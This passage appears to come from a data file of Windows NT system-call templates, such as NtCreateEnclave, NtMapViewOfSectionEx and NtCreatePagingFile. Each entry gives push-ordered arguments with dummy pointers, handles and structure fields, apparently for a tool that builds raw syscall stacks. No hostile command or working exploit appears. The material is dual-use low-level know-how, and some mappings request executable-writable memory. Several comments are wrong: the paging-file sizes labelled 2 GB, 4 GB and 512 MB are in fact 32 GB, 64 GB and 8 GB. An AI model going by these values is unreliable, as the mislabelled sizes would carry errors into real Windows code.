HANDLE JobHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct74": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryInformationJobObject": { "ntFunc": "NtQueryInformationJobObject", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional, may be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000040" }, { "value": "0x00000040", "additionalComment": "ULONG JobInformationLength (typical size for JOBOBJECT_BASIC_ACCOUNTING_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to JobInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "JOBOBJECTINFOCLASS JobInformationClass (JobObjectBasicAccountingInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE JobHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationJobObject": { "ntFunc": "NtSetInformationJobObject", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG JobInformationLength (typical size for JOBOBJECT_BASIC_LIMIT_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to JobInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000002", "additionalComment": "JOBOBJECTINFOCLASS JobInformationClass (JobObjectBasicLimitInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE JobHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtTerminateJobObject": { "ntFunc": "NtTerminateJobObject", "pushes": [ { "value": "0xC0000001", "additionalComment": "NTSTATUS ExitStatus (STATUS_UNSUCCESSFUL)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE JobHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCallEnclave": { "ntFunc": "NtCallEnclave", "pushes": [ { "value": "0x00000000", "additionalComment": "Optional PVOID (None, not used in this example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN WaitForThread (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "PVOID Parameter (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xDEADBEEF" }, { "value": "0xbadd0040", "additionalComment": "PENCLAVE_ROUTINE Routine (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00401000" } ], "structures": {} }, "NtTerminateEnclave": { "ntFunc": "NtTerminateEnclave", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN WaitForThread (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00400000", "additionalComment": "PVOID BaseAddress (typical enclave base address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtInitializeEnclave": { "ntFunc": "NtInitializeEnclave", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG Result (dummy pointer, optional out parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000020", "additionalComment": "EnclaveInformationLength (32 bytes, typical for SGX)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to EnclaveInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadcafe0" }, { "value": "0x00400000", "additionalComment": "BaseAddress (typical enclave base address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateEnclave": { "ntFunc": "NtCreateEnclave", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG Result (dummy pointer, optional out parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000020", "additionalComment": "EnclaveInformationLength (32 bytes, typical for SGX)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to EnclaveInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadcafe0" }, { "value": "0x00000001", "additionalComment": "EnclaveType (ENCLAVE_TYPE_SGX)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "InitialCommitment (4 KB, typical page size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100000", "additionalComment": "Size (1 MB enclave)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ZeroBits (no address restriction)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to PVOID BaseAddress (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtLoadEnclaveData": { "ntFunc": "NtLoadEnclaveData", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG Result (dummy pointer, optional out parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0060", "additionalComment": "Pointer to SIZE_T BytesWritten (dummy pointer, optional out parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00000010", "additionalComment": "PageInformationLength (16 bytes, typical for SGX)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to PageInformation (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadcafe0" }, { "value": "0x00000040", "additionalComment": "Protect (PAGE_EXECUTE_READWRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "BufferSize (4 KB, typical page size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadcafe0" }, { "value": "0x00400000", "additionalComment": "BaseAddress (typical enclave base address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateSectionEx": { "ntFunc": "NtCreateSectionEx", "pushes": [ { "value": "0x00000002", "additionalComment": "ExtendedParameterCount (2 parameters)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to MEM_EXTENDED_PARAMETER array (dummy pointer)", "structurePointer": "MEM_EXTENDED_PARAMETER", "structureRef": "struct75", "structureValueExpectations": "Array of MEM_EXTENDED_PARAMETER structures.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "FileHandle (None, pagefile-backed section)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x08000000", "additionalComment": "AllocationAttributes (SEC_COMMIT)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000004", "additionalComment": "SectionPageProtection (PAGE_READWRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to LARGE_INTEGER MaximumSize (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct76", "structureValueExpectations": "Maximum size of the section in bytes.", "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct77", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F000F", "additionalComment": "DesiredAccess (SECTION_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00c0", "additionalComment": "Pointer to HANDLE SectionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct75": { "type": "MEM_EXTENDED_PARAMETER", "fields": [ { "fieldName": "Type", "fieldType": "ULONG_PTR", "fieldValue": "0x00000001", "fieldComment": "MEM_EXTENDED_PARAMETER_TYPE" }, { "fieldName": "Reserved", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Reserved, must be zero" }, { "fieldName": "Value", "fieldType": "ULONG_PTR", "fieldValue": "0x00000001", "fieldComment": "Sample value" } ] }, "struct76": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x000200000", "fieldComment": "2 MB section size" } ] }, "struct77": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (unnamed section)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtMapViewOfSectionEx": { "ntFunc": "NtMapViewOfSectionEx", "pushes": [ { "value": "0x00000002", "additionalComment": "ExtendedParameterCount (2 parameters)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "Pointer to MEM_EXTENDED_PARAMETER array (dummy pointer)", "structurePointer": "MEM_EXTENDED_PARAMETER", "structureRef": "struct78", "structureValueExpectations": "Array of MEM_EXTENDED_PARAMETER structures.", "pointedValue": None }, { "value": "0x00000040", "additionalComment": "Win32Protect (PAGE_EXECUTE_READWRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "AllocationType (MEM_COMMIT)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to SIZE_T ViewSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00100000" }, { "value": "0xbadd00f0", "additionalComment": "Pointer to LARGE_INTEGER SectionOffset (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct79", "structureValueExpectations": "Offset into the section.", "pointedValue": None }, { "value": "0xbadd0100", "additionalComment": "Pointer to PVOID BaseAddress (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000888", "additionalComment": "HANDLE SectionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct78": { "type": "MEM_EXTENDED_PARAMETER", "fields": [ { "fieldName": "Type", "fieldType": "ULONG_PTR", "fieldValue": "0x00000002", "fieldComment": "MEM_EXTENDED_PARAMETER_TYPE" }, { "fieldName": "Reserved", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Reserved, must be zero" }, { "fieldName": "Value", "fieldType": "ULONG_PTR", "fieldValue": "0x00000002", "fieldComment": "Sample value" } ] }, "struct79": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x00000000", "fieldComment": "Offset 0" } ] } } }, "NtUnmapViewOfSectionEx": { "ntFunc": "NtUnmapViewOfSectionEx", "pushes": [ { "value": "0x00000000", "additionalComment": "Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00400000", "additionalComment": "BaseAddress (commonly the base of a mapped section)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreatePartition": { "ntFunc": "NtCreatePartition", "pushes": [ { "value": "0x00000001", "additionalComment": "PreferredNode (example: NUMA node 1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, typically None for unnamed partition)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct80", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "DesiredAccess (example: PARTITION_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE PartitionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000444", "additionalComment": "HANDLE ParentPartitionHandle (dummy handle, often None for root)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct80": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (unnamed partition)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenPartition": { "ntFunc": "NtOpenPartition", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, typically points to named partition)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct81", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x00120001", "additionalComment": "DesiredAccess (example: PARTITION_QUERY_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE PartitionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct81": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0xbadd0060", "fieldComment": "Pointer to UNICODE_STRING (dummy pointer, named partition)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtManagePartition": { "ntFunc": "NtManagePartition", "pushes": [ { "value": "0x00000020", "additionalComment": "PartitionInformationLength (example: 32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to PartitionInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "PARTITION_INFORMATION_CLASS (example: PartitionBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE SourceHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE TargetHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtMapUserPhysicalPages": { "ntFunc": "NtMapUserPhysicalPages", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG_PTR UserPfnArray (dummy pointer, typically array of page frame numbers)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000010", "additionalComment": "NumberOfPages (example: 16 pages)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00500000", "additionalComment": "VirtualAddress (example: base address to map physical pages)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAllocateUserPhysicalPagesEx": { "ntFunc": "NtAllocateUserPhysicalPagesEx", "pushes": [ { "value": "0x00000002", "additionalComment": "ULONG ExtendedParameterCount (requesting 2 extended parameters)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to MEM_EXTENDED_PARAMETER array (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0100" }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG_PTR UserPfnArray (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG_PTR NumberOfPages (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetWriteWatch": { "ntFunc": "NtGetWriteWatch", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to ULONG Granularity (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG_PTR EntriesInUserAddressArray (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000008" }, { "value": "0xbadd0050", "additionalComment": "Pointer to PVOID UserAddressArray (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0x00002000", "additionalComment": "SIZE_T RegionSize (8 KB region)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00400000", "additionalComment": "PVOID BaseAddress (typical image base)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG Flags (WRITE_WATCH_FLAG_RESET)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtResetWriteWatch": { "ntFunc": "NtResetWriteWatch", "pushes": [ { "value": "0x00002000", "additionalComment": "SIZE_T RegionSize (8 KB region)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00400000", "additionalComment": "PVOID BaseAddress (typical image base)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreatePagingFile": { "ntFunc": "NtCreatePagingFile", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to LARGE_INTEGER ActualSize (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct82", "structureValueExpectations": "Actual size of the paging file in bytes.", "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to LARGE_INTEGER MaximumSize (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct83", "structureValueExpectations": "Maximum size of the paging file in bytes.", "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to LARGE_INTEGER MinimumSize (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct84", "structureValueExpectations": "Minimum size of the paging file in bytes.", "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to UNICODE_STRING PageFileName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct85", "structureValueExpectations": "Path to the paging file.", "pointedValue": None } ], "structures": { "struct82": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000800000000", "fieldComment": "Actual size: 2 GB" } ] }, "struct83": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000001000000000", "fieldComment": "Maximum size: 4 GB" } ] }, "struct84": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000200000000", "fieldComment": "Minimum size: 512 MB" } ] }, "struct85": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length in bytes (16 UTF-16 chars)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0040", "fieldComment": "Buffer capacity in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd00c0", "fieldComment": "Pointer to paging file path string (dummy pointer)" } ] } } }, "NtCancelIoFileEx": { "ntFunc": "NtCancelIoFileEx", "pushes": [ { "value": "0xbadd00a0", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct86", "structureValueExpectations": "Receives I/O completion status.", "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to IO_STATUS_BLOCK IoRequestToCancel (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct87", "structureValueExpectations": "Pointer to I/O request to cancel.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct86": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "Operation status (initialized to STATUS_SUCCESS)" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Operation-specific information" } ] }, "struct87": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0xc0000120", "fieldComment": "STATUS_CANCELLED" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "Operation-specific information" } ] } } }, "NtCancelWaitCompletionPacket": { "ntFunc": "NtCancelWaitCompletionPacket", "pushes": [ { "value": "0x00000000", "additionalComment": "BOOLEAN RemoveSignaledPacket (FALSE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE WaitCompletionPacketHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateWaitCompletionPacket": { "ntFunc": "NtCreateWaitCompletionPacket", "pushes": [ { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES ObjectAttributes (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00100001", "additionalComment": "ACCESS_MASK DesiredAccess (SYNCHRONIZE | GENERIC_READ)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE WaitCompletionPacketHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtCompareObjects": { "ntFunc": "NtCompareObjects", "pushes": [ { "value": "0x0000beef", "additionalComment": "HANDLE Handle2 (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE Handle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCompareTokens": { "ntFunc": "NtCompareTokens", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to BOOLEAN Equal (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x0000beef", "additionalComment": "HANDLE SecondTokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cafe", "additionalComment": "HANDLE FirstTokenHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtContinueEx": { "ntFunc": "NtContinueEx", "pushes": [ { "value": "0x00000000", "additionalComment": "PKCONTINUE_ARGUMENT ContinueArgument (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PCONTEXT ContextRecord (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateCrossVmEvent": { "ntFunc": "NtCreateCrossVmEvent", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to GUID (dummy pointer, typically None unless cross-VM event is named)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Unknown parameter, typically None", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Unknown ULONG parameter, typically 0", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, often None for unnamed event)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct88", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "DesiredAccess (EVENT_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE EventHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct88": { "type": 